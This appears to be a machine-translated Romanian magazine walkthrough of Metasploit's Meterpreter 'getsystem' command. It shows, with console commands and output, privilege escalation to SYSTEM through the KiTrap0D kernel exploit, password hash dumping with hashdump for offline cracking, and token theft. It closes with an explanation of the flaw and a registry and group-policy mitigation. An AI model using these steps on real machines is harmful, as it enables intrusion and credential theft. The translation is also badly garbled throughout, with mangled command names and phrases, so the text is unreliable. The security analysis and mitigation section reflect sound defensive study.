Doar cu câteva zile înainte de livrarea numărului în imprimat Metasploit primit
modul proaspăt, despre care pur și simplu nu ne-am putea ajuta decât să spunem. mulțumesc
o nouă comandă getystem, pe un sistem compromis a devenit posibil să meargă
de la nivelul utilizatorului în ring0, obținând drepturile de la NT AUTHORITY \ SYSTEM! Și asta - în orice
versiuni de Windows.
Operațiunea "Captură sistem"
Deci, avem acces la un sistem la distanță (un bun exemplu
funcționarea este dată în articolul "Operația" Aurora ") și suntem în consola
metasploita. Să vedem cum sunt lucrurile cu noi cu drepturi:
metrupret> getuid
Nume utilizator server: WINXPSP3 \ user
Da, utilizatorul mediu. Poate chiar face parte din grup
administratori, dar nu contează pentru noi. Conectăm modulul în care se află
comanda getystem, despre care suntem interesați și verificați dacă s-a scufundat
Ecranul de ajutor:
metrupreter> utilizați priv
Încărcare extensie priv. succes.
metru> devine sistem-h
Utilizare: getystem [opțiuni]
Încercați să ridicați privilegiul dvs. la cel al sistemului local.
Opțiuni:
-h Ajutați bannerul.
-• Tehnica de utilizat. (Implicit la '0').
Toate tehnicile disponibile
1. Serviciu - Impersonarea cu numele de țevi (în memorie / Admin)
2. Serviciu - Impersonarea numelui de țevi (Dropper / Admin)
3. Serviciu - duplicarea codului (în memorie / administrator)
4. Exploit - KiTrap0D (În Memorie / Utilizator)
După cum puteți vedea, KiTrap0D consolidează doar o parte din funcționalitatea echipei.
Dacă ați reușit să apucați shell-ul cu un utilizator care are deja drepturi
administrator, puteți utiliza AUTHORITY \ SYSTEM
alte trei tehnici (puteți selecta opțiunea -t). Oricum, fără a specifica
în general, nu există parametri, vom indica un metasplite pe care acesta din urmă îl poate utiliza
oricare dintre abordări. Inclusiv KiTrap0D, care va crește privilegiile noastre la nivelul
"Sistem", indiferent de drepturile pe care le avem acum.
metru> getystem
. a primit sistem (prin tehnica 4).
Da, a primit un mesaj despre creșterea cu succes a privilegiilor și pentru atac
KiTrap0D a fost folosit - se pare că are prioritate. Chiar suntem noi
a intrat în sistem? Să verificăm adresa UID curentă (ID de utilizator):
metrupret> getuid
Numele de utilizator al serverului: NT AUTHORITY \ SYSTEM
Există! Doar o singură comandă în consola metasplit și dreapta NT AUTHORITY \ SYSTEM
noi în buzunar. În plus, în general, totul este posibil. În acest caz, îmi amintesc, nu unul singur
un patch de la Microsoft în momentul în care revista nu era încă disponibilă.
Dați-le parolele
metrupret> getuid
Numele de utilizator al serverului: NT AUTHORITY \ SYSTEM
metrupreter> executați hashdump
[*] Obținerea cheii de pornire.
[*] Calculul cheii hboot utilizând SYSKEY 3ed7 [. ]
[*] Obținerea listei de utilizatori și a tastelor.
[*] Decriptarea cheilor de utilizator.
[*] Parola de eliminare a hashurilor.
Administrator: 500: aad3b435b51404eeaad3b435b51404ee.
Vizitator: 501: aad3b435b51404eeaad3b435b51404ee.
HelpAssistant: 1000: ce909bd50f46021bf4aa40680422f646.
Hashi a primit. Rămâne să le hrănim cu unul dintre brutoprii, de exemplu,
l0phtcrack.
Cum să reveniți la privilegii?
Situația amuzantă sa întâmplat când am încercat să readuc drepturile obișnuite
utilizator înapoi. Comanda rev2self găsită nu a funcționat și încă mai sunt
a rămas "NT AUTHORITY \ SYSTEM": aparent, este conceput pentru a lucra cu trei
alte abordări implementate în sistem. Sa întors să se întoarcă
privilegiilor, este necesar să se "fure" tokenul de proces lansat de acel utilizator,
de care avem nevoie. Prin urmare, vom afișa toate procesele cu comanda ps și alegem din ele
potrivit:
metrupret> ps
Lista proceselor
============
Nume PID pentru calea utilizatorului
--- ---- ---- ---- ----
0 [Procesul de sistem]
4 Sistemul x86 NT AUTHORITY \ SYSTEM
370 smss.exe x 86 NT AUTORITATE \ SYSTEM \ SystemRoot \ System32 \ smss.exe
.
1558 explorer.exe x86 WINXPSP3 \ utilizator C: \ WINDOWS \ Explorer.EXE
.
metpreter> steal_token 1558
Jeton furat cu numele de utilizator: WINXPSP3 \ user
metrupret> getuid
Nume utilizator server: WINXPSP3 \ user
Judecând după câmpul "Nume utilizator de server", operația a avut succes.
Cum funcționează?
În cele din urmă, merită să menționăm natura vulnerabilității care a dus la apariția lui
sploitov. Pauza de securitate apare din cauza erorii sistemului
întrerupe #GP (care se numește nt! KiTrap). Din cauza asta, cu privilegiile kernel-ului
un cod arbitrar poate fi executat. Acest lucru se datorează sistemului
incorect verifică unele apeluri BIOS când se află pe o platformă x86 pe 32 de biți
o aplicație pe 16 biți rulează. Pentru a exploata vulnerabilitatea,
Aplicație pe 16 biți (% windir% \ twunk_16.exe), manipulează cu unele
structurile sistemului și solicită să înceapă funcția NtVdmControl ()
Windows Virtual DOS Machine (alias NTSDM podsista), care, ca rezultat al anterioare
manipularea determină apelatorul de întrerupere al sistemului #GP să fie apelat și
declanșând o îmbinare. De altfel, aceasta implică singura limitare
Funcționează numai pe sisteme pe 32 de biți. În 64 de biți
Din punct de vedere operațional, nu există emulator pentru rularea aplicațiilor pe 16 biți.
Cum să vă protejați de solidaritate
Întrucât nu există o actualizare completă pentru a aborda vulnerabilitatea,
trebuie să profite de bypass-uri. Cea mai fiabilă opțiune -
dezactivați subsistemele MSDOS și WOWEXEC, ceea ce le privează pe cele unificate
funcționalitate, deoarece Nu va mai putea să apeleze funcția NtVdmControl ()
pentru a porni sistemul NTVDM. În versiunile mai vechi de Windows, acest lucru este implementat prin
în care trebuie să găsiți HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ WOW
și adăugați un nume la numele său. Pentru sisteme de operare moderne
setați o limită pentru lansarea aplicațiilor pe 16 biți
politicile de grup. Pentru a face acest lucru, apelați la GPEDIT.MSC, apoi accesați secțiunea
"Configurație utilizator / Șabloane de administrare / Componente Windows / Compatibilitate
aplicații "și activați opțiunea" Neagră la 16 biți
aplicații ".
Informațiile sunt furnizate în scopuri educaționale. Folosește-l
În scopuri ilegale, poate duce la răspundere penală.
Trimiteți-le prietenilor: